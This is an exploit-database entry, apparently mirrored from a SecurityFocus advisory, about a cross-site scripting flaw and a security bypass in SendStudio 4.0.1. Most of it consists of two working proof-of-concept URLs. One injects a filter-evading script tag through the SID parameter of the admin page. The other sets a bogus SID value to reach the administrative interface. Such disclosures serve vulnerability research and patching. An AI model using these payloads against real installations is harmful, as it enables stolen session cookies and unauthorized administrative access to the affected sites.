SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass



EKU-ID: 38288 CVE: OSVDB-ID:
Author: indoushka Published: 2009-12-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/37554/info

SendStudio (also called Email Marketer) is prone to a cross-site scripting issue and a security-bypass issue.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site steal cookie-based authentication credentials and gain unauthorized administrative access to the affected application.

The vendor reports that Interspire Email Marketer 6 is not affected.

1- XSS (High)

http://www.example.com/wl-ssf41/admin/index.php/index?SID=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

2- Bay Pass (Medium)

http://www.example.com/wl-ssf41/admin/index.php/index?SID=xx